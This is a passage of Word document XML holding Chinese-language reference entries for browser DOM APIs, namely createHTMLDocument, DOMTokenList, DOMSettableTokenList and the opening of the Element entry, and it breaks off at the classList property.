    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>DocumentType createD</w:t>
      </w:r>
      <w:r>
        <w:t>ocumentType(string qualifedName,publicId,systemId)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法创建并返回一个新的代表＜</w:t>
      </w:r>
      <w:r>
        <w:t>!DOCTYPE</w:t>
      </w:r>
      <w:r>
        <w:t>＞声明的</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentType</w:t>
      </w:r>
      <w:r>
        <w:t>节点，可将这个节点传入到</w:t>
      </w:r>
      <w:r>
        <w:t>createDocument()</w:t>
      </w:r>
      <w:r>
        <w:t>方法中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Document createHTMLDocument(string title)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法创建一个新的只包含基本文档树结构以及指定标题的</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLDocument</w:t>
      </w:r>
      <w:r>
        <w:t>对象。返回的对象的</w:t>
      </w:r>
      <w:r>
        <w:t>documentElement</w:t>
      </w:r>
      <w:r>
        <w:t>属性为一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，这个根元素有子节点＜</w:t>
      </w:r>
      <w:r>
        <w:t>hea</w:t>
      </w:r>
      <w:r>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签，其中</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>head</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素有一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t>＞子节点，＜</w:t>
      </w:r>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t>＞将指定的</w:t>
      </w:r>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t>字符串作为子节点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="813" w:name="DOMSettableTokenList"/>
      <w:r>
        <w:t>DOMSettableTokenList</w:t>
      </w:r>
      <w:bookmarkEnd w:id="813"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>带可设置字符串值的记号列表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>DOMTokenList</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>DOMSettableTokenList</w:t>
      </w:r>
      <w:r>
        <w:t>是一个同样带有</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>属性的</w:t>
      </w:r>
      <w:r>
        <w:t>DOMTokenList</w:t>
      </w:r>
      <w:r>
        <w:t>，可以通过这个属性一次性设置整个记号集。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>classList</w:t>
      </w:r>
      <w:r>
        <w:t>属性是一个</w:t>
      </w:r>
      <w:r>
        <w:t>DOMTokenList</w:t>
      </w:r>
      <w:r>
        <w:t>，它通过</w:t>
      </w:r>
      <w:r>
        <w:t>className</w:t>
      </w:r>
      <w:r>
        <w:t>属性以字符串的形式来表现记号集。如果想一次性设置所有的</w:t>
      </w:r>
      <w:r>
        <w:t>clas</w:t>
      </w:r>
      <w:r>
        <w:t>sList</w:t>
      </w:r>
      <w:r>
        <w:t>记号，可以简单地将</w:t>
      </w:r>
      <w:r>
        <w:t>className</w:t>
      </w:r>
      <w:r>
        <w:t>属性设置为一个新的字符串。</w:t>
      </w:r>
      <w:r>
        <w:t>IFrame</w:t>
      </w:r>
      <w:r>
        <w:t>元素的</w:t>
      </w:r>
      <w:r>
        <w:t>sandbox</w:t>
      </w:r>
      <w:r>
        <w:t>属性稍有不同，这个属性以及相关的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性是由</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>定义的，所以不需要一个老字符串表示和一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>DOMTokenList</w:t>
      </w:r>
      <w:r>
        <w:t>表示。在这种情况下，这个属性简单地定义为一个</w:t>
      </w:r>
      <w:r>
        <w:t>DOMSettableTokenList</w:t>
      </w:r>
      <w:r>
        <w:t>：可以像字符串一样对它进行读写，也可以使用它的方法并将它作为记号集。</w:t>
      </w:r>
      <w:r>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>htmlFor</w:t>
      </w:r>
      <w:r>
        <w:t>属性和</w:t>
      </w:r>
      <w:r>
        <w:t>Video</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>audio</w:t>
      </w:r>
      <w:r>
        <w:t>属性也都是</w:t>
      </w:r>
      <w:r>
        <w:t>DOMSettableTokenList</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 xml:space="preserve">string </w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>记号集的字符串表示，以空格分隔。可通过读写这个属性来处理这个集合，就像处理一个单独的字符串值一样。通常不需要显式地使用这个属性：当将一个</w:t>
      </w:r>
      <w:r>
        <w:t>DOMSettableTokenList</w:t>
      </w:r>
      <w:r>
        <w:t>用做一个字符串时，返回的就是这个字符串的值。如果对一个</w:t>
      </w:r>
      <w:r>
        <w:t>DOMSettableTokenList</w:t>
      </w:r>
      <w:r>
        <w:t>赋值，会隐含地设置这个属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="814" w:name="DOMTokenList"/>
      <w:r>
        <w:t>DOMTokenList</w:t>
      </w:r>
      <w:bookmarkEnd w:id="814"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>空格隔开的记号集</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>DOMTokenList</w:t>
      </w:r>
      <w:r>
        <w:t>是由空格分隔的记号字符串经过解析后的表示形式，比如一个</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>className</w:t>
      </w:r>
      <w:r>
        <w:t>属性。如同名字所暗示的，</w:t>
      </w:r>
      <w:r>
        <w:t>DOMTokenLi</w:t>
      </w:r>
      <w:r>
        <w:t>st</w:t>
      </w:r>
      <w:r>
        <w:t>是一个列表，它是一个类数组对象，有</w:t>
      </w:r>
      <w:r>
        <w:t>lenght</w:t>
      </w:r>
      <w:r>
        <w:t>属性，也可以通过索引它检索特定的记号。但更重要的是，它定义了</w:t>
      </w:r>
      <w:r>
        <w:t>contains()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>remove()</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>toggle()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，以便可以用记号集的方式处理它。如果将</w:t>
      </w:r>
      <w:r>
        <w:t>DOMTokenList</w:t>
      </w:r>
      <w:r>
        <w:t>像字符串那样用，它就等同于一个由空格分隔的记号组成的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在支持</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>classList</w:t>
      </w:r>
      <w:r>
        <w:t>属性的浏览器中，它是一个</w:t>
      </w:r>
      <w:r>
        <w:t>DOMTokenList</w:t>
      </w:r>
      <w:r>
        <w:t>，这可能是你唯一经常使用的</w:t>
      </w:r>
      <w:r>
        <w:t>DOMTokenList</w:t>
      </w:r>
      <w:r>
        <w:t>。也可参见</w:t>
      </w:r>
      <w:r>
        <w:t>DOMSettableTokenList</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>属性</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DOMTokenList</w:t>
      </w:r>
      <w:r>
        <w:t>是一个类数组对象；这个值指定它包含多少个不重复的记号。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void add(string token)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果当前</w:t>
      </w:r>
      <w:r>
        <w:t>DOMTokenList</w:t>
      </w:r>
      <w:r>
        <w:t>不包含</w:t>
      </w:r>
      <w:r>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:t>，则在列表的尾部添加它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean contains</w:t>
      </w:r>
      <w:r>
        <w:t>(string token)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果当前</w:t>
      </w:r>
      <w:r>
        <w:t>DOMTokenList</w:t>
      </w:r>
      <w:r>
        <w:t>包含</w:t>
      </w:r>
      <w:r>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:t>则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string item(unsigned long index)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回指定</w:t>
      </w:r>
      <w:r>
        <w:t>index</w:t>
      </w:r>
      <w:r>
        <w:t>处的记号，如果</w:t>
      </w:r>
      <w:r>
        <w:t>index</w:t>
      </w:r>
      <w:r>
        <w:t>超出范围则返回</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。也可以不调用这个方法，直接对</w:t>
      </w:r>
      <w:r>
        <w:t>DOMTokenList</w:t>
      </w:r>
      <w:r>
        <w:t>取索引。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void remove(string token)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果当前</w:t>
      </w:r>
      <w:r>
        <w:t>DOMTokenList</w:t>
      </w:r>
      <w:r>
        <w:t>包含</w:t>
      </w:r>
      <w:r>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:t>，就移除它；否则什么也不做。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>boolean toggle(string token)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果当前</w:t>
      </w:r>
      <w:r>
        <w:t>DOMTo</w:t>
      </w:r>
      <w:r>
        <w:t>kenList</w:t>
      </w:r>
      <w:r>
        <w:t>包含</w:t>
      </w:r>
      <w:r>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:t>，就移除它；否则添加它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="815" w:name="Element"/>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:bookmarkEnd w:id="815"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>文档元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>EventTarget</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中的元素。</w:t>
      </w:r>
      <w:r>
        <w:t>tagName</w:t>
      </w:r>
      <w:r>
        <w:t>属性定义元素的标签名或类型。元素的标准</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>属性来访问。所有属性（包括</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>属性和非标准</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性）也可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>getAttribute()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setAttribute()</w:t>
      </w:r>
      <w:r>
        <w:t>方法访问。元素内容可以通过继承自</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>的属性访问。如果你只对</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象之间的关系有兴趣，你可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>children</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>firstElementChild</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>nextElementSibling</w:t>
      </w:r>
      <w:r>
        <w:t>及相关的属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>从文档中获取</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象有很多种方法。</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>documentElement</w:t>
      </w:r>
      <w:r>
        <w:t>属性指代该文档的根元素，比如</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档的＜</w:t>
      </w:r>
      <w:r>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。对</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档来说，</w:t>
      </w:r>
      <w:r>
        <w:t>head</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>属性很相似：它们指代文档的＜</w:t>
      </w:r>
      <w:r>
        <w:t>head</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。要通过唯一的</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>属性来定位一个特定的命名元素，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>Document.getElementById()</w:t>
      </w:r>
      <w:r>
        <w:t>。如同</w:t>
      </w:r>
      <w:r>
        <w:t>15.2</w:t>
      </w:r>
      <w:r>
        <w:t>节介</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>绍过的，还可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>的方法，如</w:t>
      </w:r>
      <w:r>
        <w:t>getElementsByTagName()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>getElementsByCla</w:t>
      </w:r>
      <w:r>
        <w:t>ssName()</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>querySelectorAll()</w:t>
      </w:r>
      <w:r>
        <w:t>，来获取多个</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象。最后，可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>Document.createElement()</w:t>
      </w:r>
      <w:r>
        <w:t>来创建新的可插入文档的</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>浏览器会在文档元素上触发很多种不同的事件，同时，</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象定义了很多事件处理程序属性。另外，</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象还定义了</w:t>
      </w:r>
      <w:r>
        <w:t>EventTarget()</w:t>
      </w:r>
      <w:r>
        <w:t>方法（参见</w:t>
      </w:r>
      <w:r>
        <w:t>EventTarget</w:t>
      </w:r>
      <w:r>
        <w:t>），可用于添加及删除事件监听器。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本书之前的版本中关于</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLElement</w:t>
      </w:r>
      <w:r>
        <w:t>的参考条目已合并到本节中。注意，这儿讲述的部分属性、方法以</w:t>
      </w:r>
      <w:r>
        <w:t>及事件处理程序是</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>特有的，不能在</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档的元素上工作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除这儿列出的属性外，</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性也可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>属性来访问。</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>标签及它们合法的属性列在本参考条目的结尾处。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Attr[]attributes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Attr</w:t>
      </w:r>
      <w:r>
        <w:t>对象（代表当前元素的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>属性）的类数组对象。不过，</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象通常可通过</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>属性来访问它的属性，所以永远不会真的需要用到这个</w:t>
      </w:r>
      <w:r>
        <w:t>attributes[]</w:t>
      </w:r>
      <w:r>
        <w:t>数组。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly unsign</w:t>
      </w:r>
      <w:r>
        <w:t>ed long childElementCount</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前元素拥有的子元素（非子节点）的数目。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly HTMLCollection children</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由当前</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>的子</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>（不包括非</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>子元素，如</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Comment</w:t>
      </w:r>
      <w:r>
        <w:t>节点）组成的类数组对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly DOMTokenList classList</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
